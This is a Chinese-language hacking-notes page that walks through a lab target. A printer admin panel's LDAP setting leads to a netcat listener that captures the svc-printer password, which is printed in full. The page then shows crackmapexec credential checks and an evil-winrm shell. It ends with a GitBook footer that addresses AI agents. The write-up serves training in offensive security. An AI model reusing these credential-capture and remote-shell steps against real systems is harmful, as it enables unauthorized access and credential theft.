> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/cms/network-admin-panel-cms-exploitation.md).

# 网络管理面板

<figure><img src="/files/ce6a17701e52dab5ad95a277d9e111e5398ab266" alt=""><figcaption></figcaption></figure>

80 端口的设置显示出一个指向 `print.return.local` 通过 389 端口。

<figure><img src="/files/f922d826b0c6be6ee186d86aa7eac6cf1c2f18a7" alt=""><figcaption></figcaption></figure>

**监听 389 端口**/ 放置 `netcat` 在 389 端口的监听模式下：

```bash
nc -nlvp 389
```

* 收到一个连接，暴露出以下凭据： `svc-printer` 密码为 `1edFg43012!!`.

<figure><img src="/files/3146f9b43f9f85e64d9c2a191611202a85c8850e" alt="" width="542"><figcaption></figcaption></figure>

**使用 WinRM 验证凭据**

当 WinRM 5985 端口开放时，使用以下命令验证凭据： `crackmapexec`:

```bash
crackmapexec winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
```

* 该 `已攻破` 响应确认凭据有效。

<figure><img src="/files/6b593bd483c3c527e98f660377d66f6d9ca12932" alt=""><figcaption></figcaption></figure>

**Evil-WinRM 登录**

使用 `evil-winrm` 以获取一个 shell，用户为 `svc-printer`:

<pre class="language-bash"><code class="lang-bash"><strong>evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
</strong></code></pre>

<figure><img src="/files/c4a12f0babb4e3bce9613c3e6a2aabf26efbd7b1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/cms/network-admin-panel-cms-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
